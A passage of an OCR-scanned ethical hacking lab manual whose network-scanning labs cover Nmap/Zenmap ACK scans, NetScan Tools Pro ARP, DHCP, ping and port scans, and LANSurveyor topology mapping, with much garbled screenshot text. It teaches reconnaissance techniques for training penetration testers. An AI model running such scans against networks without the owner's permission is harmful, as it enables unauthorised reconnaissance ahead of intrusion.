Scanv Profile: Scan Tools Profile Help Target: 10.0.0.4 Command: nmap -sA -PO 10.0.0.4 Ports/ Hosts I Topology] Host Details Scans JNmap Output Details Hosts Services Filter Hosts FIGURE 6.32:The Zenmap mainwindowwiththe TargetandProfileentered Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 139
  • 57. Module 03 - Scanning Networks Zenmap Scan Cancel[~v~| Profile: ACK Flag Scan Scan Tools Profile Help Target: 10.0.0.4 Command: nmap -sA-PO !0.0.04 ScansHostDetalsHosts || Services | Nmap Output JPorts / Hosts JTopology 10.0.04;‫־‬ IS 5 Host Status btate Open portc: Filtered ports: Closed ports: Scanned ports: 1000 Uptime: Not available Last boot Not available B Addresses IPv4: 1a0.0.4 IPv6: Not available MAC: 0Q15:50:00:07:10 ♦ Comments OS « Host * 10.0.0.4 Filter Hosts Q The option: —min- rate <number>; —mas-rate <number> (Directly control the scanning rate). Nmap's dynamic timing does a good job of finding an appropriate speed at which to scan. Sometimes, however, you may happen to know an appropriate scanning rate for a network, or you may have to guarantee that a scan finishes by a certain time. FIGURE 6.34:The Zenmap mainwindowwiththe Host Detailstab Lab Analysis Document all die IP addresses, open and closed ports, sendees, and protocols you discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Types of Scan used: ■ Intense scan ■ Xmas scan ‫י‬ Null scan ■ ACK Flag scan Intense Scan —N m ap O utput ■ ARP Ping Scan - 1 host ■ Parallel DNS resolution of 1 host N m ap ■ SYN Stealth Scan • Discovered open port on 10.0.0.4 o 135/tcp, 139/tcp, 445/tcp, ... ■ MAC Address ■ Operating System Details ■ Uptime Guess ■ Network Distance ■ TCP Sequence Prediction ■ IP ID Sequence Generation ■ Service Info C E H Lab M anual Page 140 Ethical H acking and Counterm easures Copyright © by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited
  • 58. Module 03 - Scanning Networks Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Analyze and evaluate the results by scanning a target network using; a. Stealth Scan (Half-open Scan) b. nmap -P 2. Perform Inverse TCP Flag Scanning and analyze hosts and services for a target machine in die network. Internet Connection Required □ Yes Platform Supported 0 Classroom 0 No 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 141
  • 59. Module 03 - Scanning Networks Scanning a Network Using the NetScan Tools Pro iNetScanT001s Pro is an integratedcollection of internetinformationgatheringand netirork troubleshootingutilitiesforNetirork P/vfessionals. Lab Scenario You have already noticed in die previous lab how you can gadier information such as ARP ping scan, MAC address, operating system details, IP ID sequence generation, service info, etc. duough Intense Scan. Xmas Scan. Null Scan and ACK Flag Scan 111 Nmap. An attacker can simply scan a target without sending a single packet to the target from their own IP address; instead, they use a zombie host to perform the scan remotely and if an intrusion detection report is generated, it will display die IP of die zombie host as an attacker. Attackers can easily know how many packets have been sent since die last probe by checking die IP packet fragment identification number (IP ID). As an expert penetration tester, you should be able to determine whether a TCP port is open to send a SYN (session establishment) packet to the port. The target machine will respond widi a SYN ACK (session request acknowledgement) packet if die port is open and RST (reset) if die port is closed and be prepared to block any such attacks 011 the network 111this lab you will learn to scan a network using NetScan Tools Pro. You also need to discover network, gadier information about Internet or local LAN network devices, IP addresses, domains, device ports, and many other network specifics. Lab O bjectives The objective of diis lab is assist to troubleshoot, diagnose, monitor, and discover devices 011 network. 111 diis lab, you need to: ■ Discovers IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs ICON KEY ‫־‬23 Valuable information Test your knowledge ‫ס‬ W eb exercise m W orkbook review Detect local ports Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 142
  • 60. Module 03 - Scanning Networks Lab Environm ent To perform die lab, you need: ■ NetScaii Tools Pro located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsNetScanTools Pro ■ You can also download the latest version of NetScan Tools Pro from the link http:/ / www.11etscantools.com/nstpromai11.html ■ If you decide to download die latest version, dien screenshots shown in die lab might differ ■ A computer running Windows Server 2012 ■ Administrative privileges to run die NetScan Tools Pro tool Lab Duration Time: 10 Minutes O verview of N etw ork Scanning Network scanning is die process of examining die activity on a network, which can include monitoring data flow as well as monitoring die functioning of network devices. Network scanning serves to promote bodi die security and performance of a network. Network scanning may also be employed from outside a network in order to identify potential network vulnerabilities. NetScan Tool Pro performs the following to network scanning: ■ Monitoring network devices availability ■ Notifies IP address, hostnames, domain names, and port scanning Lab Tasks Install NetScan Tool Pro in your Window Server 2012. Follow die wizard-driven installation steps and install NetScan Tool Pro. 1. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop '1* 4 WindowsSer*f2012 * taataiermXni faemeCvcidilcOetoceitc EMtuaian copy, luld M>: FIGURE /.l: Windows Server2012-Desktopview 2. Click the NetScan Tool Pro app to open the NetScan Tool Pro window S 7Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks S TASK 1 Scanning the Network ^ Active Discovery and Diagnostic Tools that you can use to locate and test devices connected to your network. Active discovery means that we send packets to the devices in order to obtain responses.. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 143
  • 61. Module 03 - Scanning Networks Administrator A Start Server Manager Windows PowwShel Google Chrome HjperV kWvwcr NetScanT... Pro Demo h m o ‫י‬‫ו‬ f* Q Control Pan*l V Mjrpw-V Mdchir*. e ■»***‫■׳‬1**“'»‫־׳‬ ( onviund I't. n.".‫־‬ wrr © *I x-x-ac n 2‫ז‬20 9 FIGURE 7.2 Windows Server 2012- Apps 3. If you are using the Demo version of NetScan Tools Pro, then click Start the DEMO 4. The Open or Create a New Result Database-NetScanTooIs Pro window will appears; enter a new database name in Database Name (enter new name here) 5. Set a default directory results for database file location, click Continue * ‫ו‬Open or Create a New Results Database - NetScanTools® Pro NetScanToote Pro autom atical saves results n a database. The database «srequred. Create a new Results Database, open a previous Resdts Database, or use this software r Tranng Mode with a temporary Results Database. ■‫״‬Trainrtg Mode Qutdc Start: Press Create Training Mode Database then press Continue. Database Name (enter new name here) A NEW Results Database w l be automabcaly prefixed with MstProOata-' and w i end with ,.db?. No spaces or periods are allowed when enterng a new database name. Results Database File Location Test| Results Database Directory C :^MsersAdministratordocuments Select Another Results Database ‫*״‬Create Trainmg Mode Database Set Default Directory Project Name (opbonal) Analyst Information (opbonal, can be cisplayed r reports if desired) Name Telephone Number Fitie Mobile Number Organization Email Address Exit Program Update Analyst Information ContinueUse Last Results Database FIGURE 7.3: setting a new database name for XetScan Tools Pro 6. The NetScan Tools Pro main window will appears as show in die following figure £L) Database Name be created in the Results Database Directory and it will have NstProData- prefixed and it will have the file extension .db3 i—' USB Version: start the software by locating nstpro.exe on your USB drive ‫־‬ it is normally in the /nstpro directory p Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 144
  • 62. Module 03 - Scanning Networks _ - n | V - test • NetScanTools* Pro Demo Version Build 8-17-12 based on version 11.19 file Eflit A«es51b!11ty View IP«6 Help Wefccrwto NrtScanToobePiJ [W o Vbtfen 11 TH1 «a<Kw1n>n a d rro ro < k > * •re * T00“i Cut todi hav• niror luiti Th■ duro carrnot be cj>«vt»>0to a U v*dcn H m x x d '•on ■hr A J o i^ e d cr Vtao.a lads cr 10311groined by fm dian on the k ft panel R03 iso- root carract :‫«־‬ ta‫״‬oet. orwn icon :coa I8!en to noucrktniffc. ttu; icon tooo ‫•ו‬® * we• y o j oca sy*em. end groy!con 100b contact ihid party Fleet ' i t FI '«&, to vie‫״‬ e<? a terg h * local help ircLidng Gerttirg Suited >randtiai Automated tools M3nu3l tool: 13III fw orne tools *LCrre Dttcover/tools Pass‫״‬re 0‫י‬ scow1y ro ols Otis 0015‫ז‬ P3«et le v * tools tx tm u l tools prootam into FIGURE 7.4: Main window of NetScan Tools Pro 7. Select Manual Tools (all) on the left panel and click ARP Ping. A window will appears few information about die ARP Ping Tool. 8. Click OK ‫ז‬-‫•°־היד‬ Klrt'iianTooltS Pio 'J test NetScanToois® Pro Demo Version Build 8 17 12 based o r version 11.19 File fdit A<<f11bil1ly Virw IPv6 MHp About the A R P Ping Tool • use this to o l to "PiMti‘ an IPv4 address on yo u r subnet usino a r p paefcrts. •se !r on your LAN to find the 1a4>: ' a tkne o ' a device to an ARP_REQl)EST jacket evai if ‫«יכ‬ d&r ce s hidden and does not respond to ‫־׳‬egu a Png. • A R P P in a require*,‫ג‬ ta rg e t IP v 4 addresson your LAN. • D o n 't m iss th is sp ec ia l fe a tu r e in th is to o l: Identify duplicate IPv4 address b y ‘sin gin g‘ a sse cfic IPv4 address. If more th2 - Gne device (tw o or rrore MAC addresses} responds, you are sh ow n the m a c address of eech of th e deuces. • D o n 't f o r g e t to r!ght d k * in th e results for a m enu with more options. Dem o I im itations • None. Automata!! Tool Manual Tool( Ml im ARP Scan (MAC Ua i jCa«h« F m n itd ♦ C0*n «t» 0rt Monrt. Pjv<mKc Tooll A111vc Dhccnrcry To‫׳‬ Piss ‫״‬re Oacovety T« orisroots P3c«1Leveltool: bcemai toots Pro0r3m Into | ( <x Help pres? FI FIGURE 7.5: Selecting manual tools option Select the Send Broadcast ARP, then Unicast ARP radio button, enter the IP address in Target IPv4 Address, and click Send Arp 9. — IP version 6addresses have a different format from IPv4 addresses and they can be much longer or far shorter. IPv6addresses always contain 2 or more colon characters and never contain periods. Example: 20 0 1 :4860:b006:69 (ip v 6. g o o g le . com) o r : : 1 ( in te r n a l loopback a d d re ss £7 Arp Ping is a useful tool capable of sending ARP packets to a target IP address and it can also search for multiple devices sharing the same IP address on your LAN Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 145
  • 63. Module 03 - Scanning Networks s i- ! ‫״‬,test NetScanTools® Pro Demo Version Build 8 17 12 based on version 11.19 File Fdit Accessibility View IPv6 Help ‫ג‬ * ‫ו‬® To Aatom*ted | Report? Q Addto Psvorftac Send &0‫־‬acc35T ARP, then in tost ARP D upi:a;es S-‫־‬c ‫מ‬ (f:00.00 Ol^FAa* E O sendB-oaCcae:arp cnly OSe*th for Dipicate IPAddesoss U9eARPPadtetsto Pnc an [Pv«adjfc55onyar subnet. Target IPva Aadett index ip Address mac Address Response Tine (aseci Type 0 10.0.0.1 - •• • * ♦ - cc 0.002649 Broadcast 1 < * ♦‫־‬10.0.0.1 cc :.o ::» to U nicast 2 10.0.0.1 - - ■+ ce 0.003318 OnIcaat 3 10.0.0.1 cc 0.002318 U nicast 4 10.0.0.1 • cc 0.0:69*3 ur.ic a a t 5 10.0.0.1 - •• — ♦ cc 0.007615 Cr.le a s t f 1 0 .0 .0 .1 cc O.OC25IC Cr.Icaat ‫ל‬ 10.0.0.1 - *• • * <» cc 0.00198C (Inic a a t 8 • • » • ‫־‬ • ♦ ‫־‬ '1 0 .0 .0 .1 cc o.ooiess Onicaat 3 1 0 .0 .0 .1 - • • • « » ♦ cc 0.0:2318 Ur.icaat 10 1 0 .0 .0 .1 cc 0.0:26*9 Ur.icaat 11 10.0.0.1 - a. ■* <» - cc 0.0:2649 tin ic a a t 12 10.0.0.1 - ♦ cc 0.002318 (Tnic a a t 13 • • • • • • » « ♦ ‫״‬10.0.0.1 cc 0.002318 Unieaat 14 10.0.0.1 • cc :.0 :2 6 4 9 Vnicaat 15 1 0 .0 .0 .1 Cr.ic a a t iendArc Stop N jr b n to Send cvcteTne (ms) I“00 EJ WnPcapI‫״‬Tcrfe<TP Automated Tools ►.Unual Tools lalf) U ARPPing u ■an |MA£ u A flP?c«n|M A Ci<‫״‬ n) Cache Forensic! Co‫״‬ n«t»on Monitor |v | Fawonte Tooli Aa!re DHtovery Tool! Pj11 !x< Oiiovcry Tooli O t« Tools P a « « level rools trtem ji looit f*‫־‬coram Into FPuiger 7.6: Result of ARP Ping 10. Click ARP Scan (MAC Scan) in the left panel. A window will appear with information about the ARP scan tool. Click OK Q Send Broadcast ARP, and then Unicast ARP - this mode first sends an ARP packet to the IPv4 address using the broadcast ARP MAC address. Once it receives a response, it sends subsequent packets to the responding MAC address. The source IP address is your interface IP as defined in the Local IP selection box 1al Tools • ARP Pti•y J •‫־‬p o ad c a a t ic a a t le a s t le a s t lea se i c a s t ic a a t l e a s t l e a s t icaat !ea st !e a s t le a s t ic a a t test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19 File Fdit Accessibility View IPv6 Help About the A R P Scan Tool • Use Uib tool lo send an ARP RoqiM&t to evury IPv4 addrtsA on your LAN. IPv4 connected devices cswtrtArtsfrom ARP .K u n and mu»t rupond with th«f IP •nd MAC *d fir•*•. • Uncheck we ResoKre f>5 box for fssrti scan co‫׳‬rpi«on ome. • Don't Cornet to 1io : d tk n the 1e>ute for a menu with moio options. mo Lim itations. Hone. Automated Toot y ARPStan 1mac sea Ca<n« ForcnsKs Attn* Uncovery 10 relivel>K0v»ryl« Tool ‫ש‬ ARP Scan (sometimes called a MAC Scan) sends ARP packets to the range of IPv4 addresses specified by the Start and End IP Address entry boxes. The purpose of this tool is to rapidly sweep your subnet for IPv4 connected devices. FIGURE 7.7: Selecting ARP Scan (MAC Scan) option 11. Enter the range o f IPv4 address in Starting IPv4 Address and Ending IPv4 Address text boxes 12. Click Do Arp Scan Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 146
  • 64. Module 03 - Scanning Networks ‫־‬ar The Connection Detection tool listens for incoming connections on TCP or UDP ports. It can also listen for ICMP packets. The sources of the incoming connections are shown in the results list and are logged to a SQLite database. 13. Click DHCP Server Discovery in the left panel, a window will appear with information about DHCP Server Discovery Tool. Click OK f*: test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19 ! ‫־‬ n ' * f4e Ed* Accessibility View IPv6 H e# LJ DHCP is a method of dynamically assigning IP addresses and other network parameter information to network clients from DHCP serv. FIGURE 7.9: Selecting DHCP Server Discovery Tool Option 14. Select all the Discover Options check box and click Discover DHCP Servers RPSean tMAC Son, c ry Type lo c a l naxle 10.0.0 n a x ic 1 0 .0 .0 About Hit* DHCP Sorv1*f Discovery Tool • U se U ib 1004 t o j it n n iy t o u t e DHCP aanrors ( IP v1 o n ly ) o n you r local n e tw o r k . It ifto m th« P addrau and k « : ‫־‬g» * » b«ng landed out by DHCP Ih it too! a n a to find unknown or rooue' DHCP *rv erj. • D o n 't Io tg e t to right d c k n th« results for a menu with more options. Dano limitations. • N one. *u»0*n8ted lool Manual 10011 tall Catha Forrniict ♦ Connection Monitc O K P S fw r Oucorc a>T00IS - ‫י‬ J DNS Tools-core P n tn r Ditcaveiy Tc P « l r l level Tool External Too 11 ‫י‬‫־־‬“‫היו‬‫־‬test NetScanTools* Pro Demo Version Build 8-17 12based0nvefs»0n !1.19 File Edil Accembility View IPv6 Help Manual Too 4 - ARP Scan (MAC Stan) $ Adsnocc [ J j‫׳‬p 0 ‫־‬ A 1 2 ra a l I]Addts^avaKat Staroic F v4 Acerea‫־‬ | :0. 0 &v4ngIPv4Adjress Entry Type l>5c•! dyr.arie 10 . 0.0 dynaxac 1 0 .0 .0 ip v i M . . . w e Adflreofl r / r M 4 n u r*c f3 re r B cttaM C 1 0 .0 .0 .1 0( ‫׳‬ « - . . . n e t;c a r , la c . 1 1 0 .0 .0 .2 EC . &»11 la c vm-MSSCL. ‫פב‬ U9e thE tod a fine al active IPv4 d riers o‫י׳‬ you! n im -t. iVnPcwInterfaxS' I 10.0.0.7 Scon OSsy Tnc {•>») (IZZ₪ 0 Resolve Ps ii/to n a te d Toots Manual Tools lalf) ARP Ping can (MAC u A«P*can(MAC5<an) Cache forensic( Connection Monitor FawxKe Tools Active Discovery Tool! P^iiixe Discovery Too11 otis roois PSCttt LCV(I Tools exttmai toon »0‫־י‬gram into FIGURE 7.8 Result of ARP Scan (MAC Scan) Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 147
  • 65. Module 03 - Scanning Networks Q NetScanner, this is a Ping Scan or Sweep tool. It can optionally attempt to use NetBIOS to gather MAC addresses and Remote Machine Name Tables from Windows targets, translate the responding IP addresses to hostnames, query the target for a subnet mask using ICMP, and use ARP packets to resolve IP address/MAC address associations FIGURE 7.10: Result of DHCP Server Drscovery 15. Click Ping scanner in the left panel. A window will appear with information about Ping Scanner tool. Click OK £0 Port Scanner is a tool designed to determine which ports on a target computer are active Le. being used by services or daemons. 16. Select the Use Default System DNS radio button, and enter the range of IP address in Start IP and End IP boxes 17. Click Start NttSunTooii* P!o S? test NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19 A b ou t the Ping Scanner (a ka N etScann er) lo o l • use rim r o d ro pm g a ranoe o r lm o f IPv4 addresses. this tool shows you ch compuw‫׳‬ s are acOve w tJiir! ? 0 * 106, h t(:re » hav« to rapond to ping). Uso it *vith an* u t o f F a d flf«s «. To **eafl ee*‫׳‬ c*s n your subrtrt indudmg trios*blocking ping, you can j m u m ARP So n tool. • You can ■nport a te x t lest o f IP v4 addresses to pmg. D o n 't mres th is s p w a l fe a tu re m th is to o k use the Do SMB/NBNS Scan to per NetBIOS r«oom «5 fiom unprotected W in d o ** corrput&s. • D o n 't fo rg e t td nght d!dc m the results for a menu with more opaons. D em o Im ita tio n s . • Packet Delay (tim e b etw een sending each pm g) is lim ited to a lo w e r tamt o f SO nulliseconds. P arker Delay can b e as lo w as zero (0 ) ms m th e f i l l version. In o th e r words, th e full version w i b e a b it faster. F8e EdK Atcesiiblfity Vltw IPv6 H«tp A j . j A I C WtKOIM AUtOIMt«J ToOh M jn g jl T00K (411 mRng ErvurKcJ mfir,g - Graphical a Port Scanner . JP’oam u o in M odf *><« ravontctoon ‫׳‬0!MintDticovery 10Discovery DNS10011 P x te t L trti tooii Tools °rooram inro FIGURE 7.11: selecting Ping scanner Option I V test - NetScanTools* Pro Demo Version Build 8-17-12 based or version 11.19 Fnri DHCPServers an f a r Add Itoie For Hdo. p‫-׳‬e£8 F: IM A *rtonoted Ode or mtrrfacc bdow then crcos Discover QAddtoP®»flnre5 T M A ddress KIC Addreas I n t« r f « r • D e sc rip tio n 1 0 .0 .0 .7 L . A A «» I I iD H yper-V V i r t a • ! E th e rn e t A dapter #2 Rsxordnc DHCP Servers Discover ( X P Server* Stop W at Time (sec) EHCr S e r v e r I P S e r v e r Hd3 LnoM O f f e r e d I ? O f f e r e d S u b n e t Mask IP A d d re s s I 1 0 .0 .0 .1 1 0 .0 .0 .1 1 0 . 0 . 0 . 2 ‫י‬ SS. 2SS. 2SS. 0 3 d ays, 0 :0 ( DiscouB0 ‫?־‬H3n t ‫י‬ ‫׳‬ H05tn3r 1e V Subnet M5*r V‫׳‬ D onor ftairc ‫׳י‬ d n s p ‫׳י‬ Router P fa*KTP Servers Aurcmated To015 Cache Forenjio B.:nnccton Monitor DHCP S«1 1 »‫׳‬ Discovery aTook - ! a DIIS Took - Coie DMSloo's ■Advanced FiwoiiU Tools A<tfc« Dii coveiy Tools Paislv* Discovery Tools DNS Too11 C rrtl Tooli W * ‫*וזז‬ Tools Pioqrtm Inro Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 148
  • 66. Module 03 - Scanning Networks test - NetScanTools* Pro Demo Version Build 8-17-12 based or version 11.19 ----- « e 6dK Accessibility View IPv6 Start iP 10.0.0.: ‫י‬‫׳‬ ‫ח‬ ‫ח‬ |‫•׳‬ ' Lke Defadt System DN5j EndJP 10.0.0.S0 - IH O Use Specific DNS: v l l * AKANrtSeannw □ *5<J r0f®«0n?r3 Time ( M | StA toa 0:0 te a : s c p iv 0:0 tchs toply 0:0 Echs taply 0:0 Echs Reply T a rg e t IP Hostname 10.0.0.1 ? 0 10.5.0.2 tnK‫־‬KS3ELOUK41 0 10.0.0.5 my:-UQM3MRiR«M 0 1 0 .0 .0 .7 WIN-D39HRSHL9E4 0 Fa Hdp, press F1 0 ResolveTPs MSttp.0/.255Wl Addtbnal ScanTests: 1 103 I oca ARPSeen □ 0 3 S*‫׳‬E.fc8S Scar □ Do Sulnel M ai: Sea‫!־‬ EnaSfc Post-Scan M O b lg of Msn-decso'dns Ps | irw:»vu«: I Oeof Imported tm Aurc mated To015 © Port Scanner mPro»ucu ou5 M ode S<onr ^ FaroiK• Tools Attfci* Oil cover?Tools Pais** Discovery Tools DNS Too11 S* ‫׳‬J «I L*vtl ToolI M * 1nal Tools Pfogr•!* Info CQ Traceioute is a tool that shows the route your network packets are taking between your computer and a target host. You can determine the upstream internet provider(s) that service a network connected device. FIGURE 7.12: Result of sail IP address 18. Click Port scanner in the left panel. A window will appear with information about die port scanner tool. Click OK - _ l n l x ‫ך‬ unnti/NetSunnei 9 test NetScanTool‘ $ Pro Demo Version Build 8-17-12 based on version 11.19F About the Port Scanner 1ool NEVERSCAN A COMPUTER YOU DO NOT OWN OR HAVE THE OWNER’S PERMISSION TO SCAN. • use rtm ‫ז‬ool to scan 1target for icp or ‫*וגווו‬ ports that .‫ר‬‫מו‬ listening (open with senna* fcstening). • ly p e s o f sc a n n in g su p p o rted : ‫״‬ull C onnect TCP Scan (see notes below }. U0P port u 'reoch asle scan, combined TCP ful c o r r e c t and UOP scan, TCP SYN only scan and t c p OT^er s o n . • D o n 't m iss th is sp ec ia l le d tu r e in t h 's to o l: After a target has been scanned, an a‫״‬ alfs s .vineow will open in >our Oeh J t w eb browser. • D o n 't fo r g e t ‫מז‬ n gh t c*<k n w e resjits for 3 menu with m ore options. Notes: settings that strongly affect scan speed: • Come::ton Timeout use 200 c* less on a fast network correction yjdhneaiby cor‫״‬p .te i. _ * 3 ) 3003 ‫־‬ seconds) or more on ad a u : conneoo‫־׳‬ • W ot After Connect - J is c- ►‫י‬0‫י‬ «long each port test waits before deoting thot ih ; port is ,‫־‬o r a o e . • setfln<cA>ebvsettee* ccmccxns. Try0, (hen(ry lire. Noticethedfferexe. • SfetU1» ° ‫־‬ M G m e c jir * Domo KmlUtlons. • Hone. F ie Ed11 Accembilrty View IPv6 Help rii h 3■‫>ב‬I^ WeKom* Automated T0011 M«nu«ITouU Iall PW0 tnnanced P nq Scanner Port Scanner uP01»K U 0ut Mode ‘ FIGURE 7.13: selectingPort scanner option 19. Enter the IP Address in the Target Hostname or IP Address field and select the TCP Ports only radio button 20. Click Scan Range of Ports Whois is a client utility that acts as an interface to a remote whois server database. This database may contain domain, IP address or AS Number registries that you can access given the correct query Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 149
  • 67. Module 03 - Scanning Networks ‫׳‬‫״‬‫־‬1-1°test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19 fte Ed* Accessibility View 6‫י)ו‬ Help Manual Fools - Port Scanner ^ I • ■ ' T C P P o r t s I PoreRange are! Sarvfcafc LDP P3te Cny AripTO *utOHMted | O TCP4UJPPorts ( I Otcpsyn OlCPaMM □^to^ont• Start 1 B'd f a T3r0ut HKTSire 3r P A:d‫£־‬S3 I10.0-01 I WARNING: the- tod scan? r * rargrfr- ports. Scan C irp lrtr. Show Al Sanr«d Ports, Actlvi 0‫ז‬Not P o rt P o rt D vac P ro to co l R e su lt■ O at• R» » .v » d 80 h te p TCP P o rt A c tiv e R.anoc of ! v s‫״‬Sea St* ‫י‬ Comnon Path | &dtco n w > Parts Let :‫־‬MrPasp:-ir-^acr 10.D.0. Connect Trcout ( 100D= !second] : w a t Aftc‫׳‬ co‫>¥־‬co ( I COD - 1**tontf : FIGURE 7.14: Result of Port scanner Automated Tool? Manual Toots (alij m Port Stunner JPro«ncuou5 Mode 1 f3vor1t* Tools /»<t*‫«׳‬ Discoreiy Tools Passr/t Discovery tools DNS roois p « * « t tm l loon txttm ji Tools Program inro Lab Analysis Document all die IP addresses, open and closed ports, services, and protocols you discovered during die lab. Tool/U tility Inform ation C ollected/O bjectives Achieved ARP Scan Results: ■ IPv4 Address ■ MAC Address ■ I/F Manufacturer ■ Hostname ■ Entry Type ■ Local Address N etScan Tools p ro Inform ation for Discovered D H C P Servers: ■ IPv4 Address: 10.0.0.7 ■ Interface Description: Hyper-V Virtual Ethernet Adapter #2 ■ D H C P Server IP: 10.0.0.1 ■ Server H ostnam e: 10.0.0.1 ■ Offered IP: 10.0.0.7 ■ Offered Subnet Mask: 255.255.255.0 Ethical H acking and Counterm easures Copyright O by EC-Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 150
  • 68. Module 03 - Scanning Networks Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Does NetScaii Tools Pro support proxy servers or firewalls? Internet Connection Required 0 Noes□ Y Platform Supported 0 iLabs0 Classroom Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 151
  • 69. Module 03 - Scanning Networks Drawing Network Diagrams Using LANSurveyor l^42s/nvejor discoversa nehvork andproduces a comprehensivenehvork diagram thatintegrates OSI Layer2 andLajer3 topologydata. Lab Scenario Ail attacker can gather information fiom ARP Scan, DHCP Servers, etc. using NetScan Tools Pro, as you have learned in die previous lab. Using diis information an attacker can compromise a DHCP server 011 the network; they might disrupt network services, preventing DHCP clients from connecting to network resources. By gaining control of a DHCP server, attackers can configure DHCP clients with fraudulent TCP/IP configuration information, including an invalid default gateway or DNS server configuration. 111 diis lab, you will learn to draw network diagrams using LANSurveyor. To be an expert network administrator and penetration te ster you need to discover network topology and produce comprehensive network diagrams for discovered networks. Lab O bjectives The objective of diis lab is to help students discover and diagram network topology and map a discovered network. 111 diis lab, you need to: ■ Draw’a map showing die logical connectivity of your network and navigate around die map ■ Create a report diat includes all you! managed switches and hubs ICON KEY 2 7 Valuable information Test your knowledge ‫ס‬ W eb exercise m W orkbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 152
  • 70. Module 03 - Scanning Networks Lab Environm ent To perform die lab, you need: ■ LANSurveyor located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksNetwork Discovery and Mapping ToolsLANsurveyor ■ You can also download the latest version of LANSurveyor from die link http: / / www.solarwi11ds.com/ ■ If you decide to download die latest version, dien screenshots shown in die lab might differ ■ A computer miming Windows Server 2012 ■ A web browser widi Internet access ■ Administrative privileges to mil die LANSurveyor tool Lab Duration Time: 10 Minutes O verview of LANSurveyor SolarWinds LANsurveyor automatically discovers your network and produces a comprehensive network diagram that can be easily exported to Microsoft Office Visio. LANsurveyor automatically detects new devices and changes to network topology. It simplifies inventory management for hardware and software assets, addresses reporting needs for PCI compliance and other regulatory requirements. Lab Tasks Install LANSurveyor on your Windows Server 2012 Follow die wizard-driven installation steps and install LANSurvyor. 1. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop ZZy Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks TASK 1 Draw Network Diagram 4 WindowsServer2012 « m m to w JOii «*<*•* C«:*d1tr 0«jce‫■׳«׳‬ (vafcrtun copy. lull) •40: FIGURE 8.1:Windows Server2012- Desktop view 2. Click the LANSurvyor app to open the LANSurvyor window C E H Lab M anual Page 153 Ethical H acking and Counterm easures Copyright © by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited
  • 71. Module 03 - Scanning Networks Start A d m in is t r a t o r £ Serw Windows G o o * H »p«V lANswv.. Moraler PowetShd Chrwne 1-'Xvj j. b m o * ■ Pamrt Q w V e £ 2 ? w : a rwn«t hptom ‫״‬ ‫ף‬ l i Megafing N ee an L . Pto Demo FIGURE 8.2 WindowsServer 2012- Apps 3. Review the limitations of the evaluation software and then click Continue with Evaluation to continue the evaluation ‫יי‬*‫י‬‫ם‬‫י‬-‫ן‬SolarWinds LANsurveyor [fie Edit Menage Mcnitoi Report Tods Window Help s o la rw in d s FIGURE 8.3: LANSurveyor evaluationwindow 4. The Getting Started with LANsurveyor dialog box is displayed. Click Start Scanning Network Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited LANsurveyor's Responder client Manage remote Windows, Linus, and Mac OS nodes from the LANsurveyor map, including starting and stopping applications and distributing files ^ LANsurveyor uses an almost immeasurable amount of network bandwidth. For each type of discovery method (ICMP Ping, NetBIOS, SIP, etc.) C E H Lab M anual Page 154
